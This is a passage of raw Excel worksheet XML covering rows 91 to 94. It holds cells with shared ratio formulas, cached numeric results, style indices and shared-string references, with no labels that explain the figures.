        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BK91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BL91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="BM91" s="501">
        <f t="shared" si="89"/>
        <v>0.1725394897</v>
      </c>
      <c r="BN91" s="501">
        <f t="shared" si="89"/>
        <v>0.001930501931</v>
      </c>
      <c r="BO91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="BP91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="BQ91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="BR91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="BS91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="BT91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BU91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="BV91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BW91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="BX91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="BY91" s="501">
        <f t="shared" si="89"/>
        <v>0.5</v>
      </c>
      <c r="BZ91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CA91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="CB91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CC91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CD91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CE91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="CF91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CG91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CH91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CI91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CJ91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CK91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CL91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="CM91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CN91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CO91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CP91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="CQ91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CR91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="CS91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CT91" s="501">
        <f t="shared" si="89"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="CV91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CW91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="CX91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="CY91" s="501">
        <f t="shared" si="89"/>
        <v>0.5</v>
      </c>
      <c r="CZ91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="DA91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="DB91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="DC91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="DD91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="DE91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="DF91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="DG91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="DH91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="DI91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="DJ91" s="502">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="DK91" s="271"/>
      <c r="DO91" s="279"/>
      <c r="DP91" s="271"/>
      <c r="DQ91" s="517" t="s">
        <v>2582</v>
      </c>
      <c r="DU91" s="271"/>
      <c r="DV91" s="271"/>
      <c r="DW91" s="517" t="s">
        <v>2583</v>
      </c>
      <c r="EA91" s="271"/>
      <c r="EB91" s="271"/>
      <c r="EC91" s="271"/>
      <c r="ED91" s="280"/>
      <c r="EG91" s="279"/>
      <c r="EH91" s="271"/>
      <c r="EI91" s="271"/>
      <c r="EJ91" s="271"/>
      <c r="EK91" s="271"/>
      <c r="EL91" s="271"/>
      <c r="EM91" s="271"/>
      <c r="EN91" s="271"/>
      <c r="EO91" s="271"/>
      <c r="EP91" s="271"/>
      <c r="EQ91" s="271"/>
      <c r="ER91" s="271"/>
      <c r="ES91" s="271"/>
      <c r="ET91" s="271"/>
      <c r="EU91" s="271"/>
      <c r="EV91" s="271"/>
      <c r="EW91" s="271"/>
      <c r="EX91" s="271"/>
      <c r="EY91" s="271"/>
      <c r="EZ91" s="271"/>
      <c r="FA91" s="280"/>
    </row>
    <row r="92">
      <c r="J92" s="277"/>
      <c r="K92" s="352" t="s">
        <v>2584</v>
      </c>
      <c r="L92" s="403" t="s">
        <v>2585</v>
      </c>
      <c r="M92" s="403" t="s">
        <v>2586</v>
      </c>
      <c r="N92" s="404" t="s">
        <v>2587</v>
      </c>
      <c r="O92" s="278"/>
      <c r="Q92" s="271"/>
      <c r="R92" s="386" t="s">
        <v>2559</v>
      </c>
      <c r="S92" s="501">
        <f t="shared" ref="S92:AF92" si="90">S44/S$29</f>
        <v>0.0004260758415</v>
      </c>
      <c r="T92" s="501">
        <f t="shared" si="90"/>
        <v>0</v>
      </c>
      <c r="U92" s="501">
        <f t="shared" si="90"/>
        <v>0.04838709677</v>
      </c>
      <c r="V92" s="501">
        <f t="shared" si="90"/>
        <v>0.1666666667</v>
      </c>
      <c r="W92" s="501">
        <f t="shared" si="90"/>
        <v>0</v>
      </c>
      <c r="X92" s="501">
        <f t="shared" si="90"/>
        <v>0.1428571429</v>
      </c>
      <c r="Y92" s="501">
        <f t="shared" si="90"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z92" s="501">
        <f t="shared" si="90"/>
        <v>0.160037767</v>
      </c>
      <c r="AA92" s="501">
        <f t="shared" si="90"/>
        <v>0.01369863014</v>
      </c>
      <c r="AB92" s="501">
        <f t="shared" si="90"/>
        <v>0.4210526316</v>
      </c>
      <c r="AC92" s="501">
        <f t="shared" si="90"/>
        <v>2.571428571</v>
      </c>
      <c r="AD92" s="501">
        <f t="shared" si="90"/>
        <v>0.0002543273043</v>
      </c>
      <c r="AE92" s="501">
        <f t="shared" si="90"/>
        <v>0.8333333333</v>
      </c>
      <c r="AF92" s="502">
        <f t="shared" si="90"/>
        <v>0.03135888502</v>
      </c>
      <c r="AG92" s="271"/>
      <c r="AH92" s="386" t="s">
        <v>2559</v>
      </c>
      <c r="AI92" s="501">
        <f t="shared" ref="AI92:DJ92" si="91">IF(AI$29=0,"-",AI44/AI$29)</f>
        <v>0.0004262574595</v>
      </c>
      <c r="AJ92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="AK92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="AL92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="AM92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="AN92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="AO92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="AP92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="AQ92" s="501">
        <f t="shared" si="91"/>
        <v>0.008771929825</v>
      </c>
      <c r="AR92" s="501">
        <f t="shared" si="91"/>
        <v>0.25</v>
      </c>
      <c r="AS92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="AT92" s="501">
        <f t="shared" si="91"/>
        <v>1</v>
      </c>
      <c r="AU92" s="501">
        <f t="shared" si="91"/>
        <v>0.5</v>
      </c>
      <c r="AV92" s="501">
        <f t="shared" si="91"/>
        <v>0.6666666667</v>
      </c>
      <c r="AW92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="AX92" s="501">
        <f t="shared" si="91"/>
        <v>0.2222222222</v>
      </c>
      <c r="AY92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="AZ92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BA92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BB92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="BC92" s="501">
        <f t="shared" si="91"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="BE92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BF92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BG92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BH92" s="501">
        <f t="shared" si="91"/>
        <v>1</v>
      </c>
      <c r="BI92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BJ92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BK92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BL92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BM92" s="501">
        <f t="shared" si="91"/>
        <v>0.1856014581</v>
      </c>
      <c r="BN92" s="501">
        <f t="shared" si="91"/>
        <v>0.1438223938</v>
      </c>
      <c r="BO92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="BP92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="BQ92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BR92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="BS92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BT92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BU92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="BV92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BW92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="BX92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="BY92" s="501">
        <f t="shared" si="91"/>
        <v>0.5</v>
      </c>
      <c r="BZ92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CA92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="CB92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CC92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CD92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CE92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="CF92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CG92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CH92" s="501">
        <f t="shared" si="91"/>
        <v>1</v>
      </c>
      <c r="CI92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CJ92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CK92" s="501">
        <f t="shared" si="91"/>
        <v>2</v>
      </c>
      <c r="CL92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="CM92" s="501">
        <f t="shared" si="91"/>
        <v>0.6</v>
      </c>
      <c r="CN92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CO92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CP92" s="501">
        <f t="shared" si="91"/>
        <v>9</v>
      </c>
      <c r="CQ92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CR92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="CS92" s="501">
        <f t="shared" si="91"/>
        <v>0.0002278284907</v>
      </c>
      <c r="CT92" s="501">
        <f t="shared" si="91"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="CV92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CW92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="CX92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CY92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="CZ92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DA92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DB92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DC92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DD92" s="501">
        <f t="shared" si="91"/>
        <v>2.5</v>
      </c>
      <c r="DE92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="DF92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="DG92" s="501" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DH92" s="501">
        <f t="shared" si="91"/>
        <v>0.04</v>
      </c>
      <c r="DI92" s="501">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="DJ92" s="502">
        <f t="shared" si="91"/>
        <v>0</v>
      </c>
      <c r="DK92" s="271"/>
      <c r="DO92" s="279"/>
      <c r="DP92" s="271"/>
      <c r="DU92" s="271"/>
      <c r="DV92" s="271"/>
      <c r="EA92" s="271"/>
      <c r="EB92" s="271"/>
      <c r="EC92" s="271"/>
      <c r="ED92" s="280"/>
      <c r="EG92" s="279"/>
      <c r="EH92" s="271"/>
      <c r="EI92" s="271"/>
      <c r="EJ92" s="271"/>
      <c r="EK92" s="271"/>
      <c r="EL92" s="271"/>
      <c r="EM92" s="271"/>
      <c r="EN92" s="271"/>
      <c r="EO92" s="271"/>
      <c r="EP92" s="271"/>
      <c r="EQ92" s="271"/>
      <c r="ER92" s="271"/>
      <c r="ES92" s="271"/>
      <c r="ET92" s="271"/>
      <c r="EU92" s="271"/>
      <c r="EV92" s="271"/>
      <c r="EW92" s="271"/>
      <c r="EX92" s="271"/>
      <c r="EY92" s="271"/>
      <c r="EZ92" s="271"/>
      <c r="FA92" s="280"/>
    </row>
    <row r="93">
      <c r="J93" s="277"/>
      <c r="K93" s="500">
        <f t="shared" ref="K93:N93" si="92">K58/$N$34</f>
        <v>0.0468413925</v>
      </c>
      <c r="L93" s="501">
        <f t="shared" si="92"/>
        <v>0.09527602963</v>
      </c>
      <c r="M93" s="501">
        <f t="shared" si="92"/>
        <v>0.1226001753</v>
      </c>
      <c r="N93" s="502">
        <f t="shared" si="92"/>
        <v>0.1246713933</v>
      </c>
      <c r="O93" s="278"/>
      <c r="Q93" s="271"/>
      <c r="R93" s="386" t="s">
        <v>2560</v>
      </c>
      <c r="S93" s="501">
        <f t="shared" ref="S93:AF93" si="93">S45/S$29</f>
        <v>0.1379420537</v>
      </c>
      <c r="T93" s="501">
        <f t="shared" si="93"/>
        <v>0.1802618328</v>
      </c>
      <c r="U93" s="501">
        <f t="shared" si="93"/>
        <v>0.9112903226</v>
      </c>
      <c r="V93" s="501">
        <f t="shared" si="93"/>
        <v>1.083333333</v>
      </c>
      <c r="W93" s="501">
        <f t="shared" si="93"/>
        <v>0</v>
      </c>
      <c r="X93" s="501">
        <f t="shared" si="93"/>
        <v>0.1428571429</v>
      </c>
      <c r="Y93" s="501">
        <f t="shared" si="93"/>
        <v>0.7142857143</v>
      </c>
      <c r="Z93" s="501">
        <f t="shared" si="93"/>
        <v>2.111766789</v>
      </c>
      <c r="AA93" s="501">
        <f t="shared" si="93"/>
        <v>0.1095890411</v>
      </c>
      <c r="AB93" s="501">
        <f t="shared" si="93"/>
        <v>1.789473684</v>
      </c>
      <c r="AC93" s="501">
        <f t="shared" si="93"/>
        <v>3.285714286</v>
      </c>
      <c r="AD93" s="501">
        <f t="shared" si="93"/>
        <v>0.001914934997</v>
      </c>
      <c r="AE93" s="501">
        <f t="shared" si="93"/>
        <v>1.166666667</v>
      </c>
      <c r="AF93" s="502">
        <f t="shared" si="93"/>
        <v>1</v>
      </c>
      <c r="AG93" s="271"/>
      <c r="AH93" s="386" t="s">
        <v>2560</v>
      </c>
      <c r="AI93" s="501">
        <f t="shared" ref="AI93:DJ93" si="94">IF(AI$29=0,"-",AI45/AI$29)</f>
        <v>0.1374680307</v>
      </c>
      <c r="AJ93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="AK93" s="501">
        <f t="shared" si="94"/>
        <v>2.5</v>
      </c>
      <c r="AL93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="AM93" s="501">
        <f t="shared" si="94"/>
        <v>0.1802618328</v>
      </c>
      <c r="AN93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="AO93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="AP93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="AQ93" s="501">
        <f t="shared" si="94"/>
        <v>0.9035087719</v>
      </c>
      <c r="AR93" s="501">
        <f t="shared" si="94"/>
        <v>0.5</v>
      </c>
      <c r="AS93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="AT93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="AU93" s="501">
        <f t="shared" si="94"/>
        <v>1.5</v>
      </c>
      <c r="AV93" s="501">
        <f t="shared" si="94"/>
        <v>1.333333333</v>
      </c>
      <c r="AW93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="AX93" s="501">
        <f t="shared" si="94"/>
        <v>1.333333333</v>
      </c>
      <c r="AY93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="AZ93" s="501">
        <f t="shared" si="94"/>
        <v>0.5</v>
      </c>
      <c r="BA93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BB93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="BC93" s="501">
        <f t="shared" si="94"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="BE93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BF93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BG93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BH93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="BI93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BJ93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BK93" s="501">
        <f t="shared" si="94"/>
        <v>1.333333333</v>
      </c>
      <c r="BL93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="BM93" s="501">
        <f t="shared" si="94"/>
        <v>4.490886999</v>
      </c>
      <c r="BN93" s="501">
        <f t="shared" si="94"/>
        <v>0.6</v>
      </c>
      <c r="BO93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="BP93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="BQ93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BR93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="BS93" s="501">
        <f t="shared" si="94"/>
        <v>2</v>
      </c>
      <c r="BT93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="BU93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="BV93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="BW93" s="501">
        <f t="shared" si="94"/>
        <v>4</v>
      </c>
      <c r="BX93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="BY93" s="501">
        <f t="shared" si="94"/>
        <v>0.5</v>
      </c>
      <c r="BZ93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CA93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="CB93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="CC93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CD93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CE93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="CF93" s="501">
        <f t="shared" si="94"/>
        <v>2</v>
      </c>
      <c r="CG93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CH93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="CI93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CJ93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CK93" s="501">
        <f t="shared" si="94"/>
        <v>6</v>
      </c>
      <c r="CL93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="CM93" s="501">
        <f t="shared" si="94"/>
        <v>3</v>
      </c>
      <c r="CN93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CO93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="CP93" s="501">
        <f t="shared" si="94"/>
        <v>9</v>
      </c>
      <c r="CQ93" s="501">
        <f t="shared" si="94"/>
        <v>2</v>
      </c>
      <c r="CR93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="CS93" s="501">
        <f t="shared" si="94"/>
        <v>0.001853005058</v>
      </c>
      <c r="CT93" s="501">
        <f t="shared" si="94"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="CV93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CW93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="CX93" s="501">
        <f t="shared" si="94"/>
        <v>2</v>
      </c>
      <c r="CY93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="CZ93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="DA93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="DB93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="DC93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="DD93" s="501">
        <f t="shared" si="94"/>
        <v>2.5</v>
      </c>
      <c r="DE93" s="501">
        <f t="shared" si="94"/>
        <v>2</v>
      </c>
      <c r="DF93" s="501">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="DG93" s="501" t="str">
        <f t="shared" si="94"/>
        <v>-</v>
      </c>
      <c r="DH93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="DI93" s="501">
        <f t="shared" si="94"/>
        <v>1</v>
      </c>
      <c r="DJ93" s="502">
        <f t="shared" si="94"/>
        <v>1.090909091</v>
      </c>
      <c r="DK93" s="271"/>
      <c r="DO93" s="279"/>
      <c r="DP93" s="271"/>
      <c r="DU93" s="271"/>
      <c r="DV93" s="271"/>
      <c r="EA93" s="271"/>
      <c r="EB93" s="271"/>
      <c r="EC93" s="271"/>
      <c r="ED93" s="280"/>
      <c r="EG93" s="279"/>
      <c r="EH93" s="271"/>
      <c r="EI93" s="271"/>
      <c r="EJ93" s="271"/>
      <c r="EK93" s="271"/>
      <c r="EL93" s="271"/>
      <c r="EM93" s="271"/>
      <c r="EN93" s="271"/>
      <c r="EO93" s="271"/>
      <c r="EP93" s="271"/>
      <c r="EQ93" s="271"/>
      <c r="ER93" s="271"/>
      <c r="ES93" s="271"/>
      <c r="ET93" s="271"/>
      <c r="EU93" s="271"/>
      <c r="EV93" s="271"/>
      <c r="EW93" s="271"/>
      <c r="EX93" s="271"/>
      <c r="EY93" s="271"/>
      <c r="EZ93" s="271"/>
      <c r="FA93" s="280"/>
    </row>
    <row r="94">
      <c r="J94" s="277"/>
      <c r="K94" s="434"/>
      <c r="L94" s="353"/>
      <c r="M94" s="353"/>
      <c r="N94" s="354"/>
      <c r="O94" s="278"/>
      <c r="Q94" s="271"/>
      <c r="R94" s="386" t="s">
        <v>2561</v>
      </c>
      <c r="S94" s="501">
        <f t="shared" ref="S94:AF94" si="95">S46/S$29</f>
        <v>0.1382616106</v>
      </c>
      <c r="T94" s="501">
        <f t="shared" si="95"/>
        <v>0.1802618328</v>
      </c>
      <c r="U94" s="501">
        <f t="shared" si="95"/>
        <v>0.9435483871</v>
      </c>
      <c r="V94" s="501">
        <f t="shared" si="95"/>
        <v>1.083333333</v>
      </c>
      <c r="W94" s="501">
        <f t="shared" si="95"/>
        <v>0</v>
      </c>
      <c r="X94" s="501">
        <f t="shared" si="95"/>
        <v>2017.142857</v>
      </c>
      <c r="Y94" s="501">
        <f t="shared" si="95"/>
        <v>1.714285714</v>
      </c>
      <c r="Z94" s="501">
        <f t="shared" si="95"/>
        <v>2.680986664</v>
      </c>
      <c r="AA94" s="501">
        <f t="shared" si="95"/>
        <v>1.260273973</v>
      </c>
      <c r="AB94" s="501">
        <f t="shared" si="95"/>
        <v>3.421052632</v>
      </c>
      <c r="AC94" s="501">
        <f t="shared" si="95"/>
        <v>3.857142857</v>
      </c>
      <c r="AD94" s="501">
        <f t="shared" si="95"/>
        <v>0.001944855856</v>
      </c>
      <c r="AE94" s="501">
        <f t="shared" si="95"/>
        <v>1.5</v>
      </c>
      <c r="AF94" s="502">
        <f t="shared" si="95"/>
        <v>1.00174216</v>
      </c>
      <c r="AG94" s="271"/>
      <c r="AH94" s="386" t="s">
        <v>2561</v>
      </c>
      <c r="AI94" s="501">
        <f t="shared" ref="AI94:DJ94" si="96">IF(AI$29=0,"-",AI46/AI$29)</f>
        <v>0.1376811594</v>
      </c>
      <c r="AJ94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="AK94" s="501">
        <f t="shared" si="96"/>
        <v>3</v>
      </c>
      <c r="AL94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="AM94" s="501">
        <f t="shared" si="96"/>
        <v>0.1802618328</v>
      </c>
      <c r="AN94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="AO94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="AP94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="AQ94" s="501">
        <f t="shared" si="96"/>
        <v>0.9035087719</v>
      </c>
      <c r="AR94" s="501">
        <f t="shared" si="96"/>
        <v>0.5</v>
      </c>
      <c r="AS94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="AT94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="AU94" s="501">
        <f t="shared" si="96"/>
        <v>3.5</v>
      </c>
      <c r="AV94" s="501">
        <f t="shared" si="96"/>
        <v>1.333333333</v>
      </c>
      <c r="AW94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="AX94" s="501">
        <f t="shared" si="96"/>
        <v>1.333333333</v>
      </c>
      <c r="AY94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="AZ94" s="501">
        <f t="shared" si="96"/>
        <v>0.5</v>
      </c>
      <c r="BA94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="BB94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="BC94" s="501">
        <f t="shared" si="96"/>
        <v>4705.333333</v>
      </c>
      <c r="BD94" s="501" t="str">
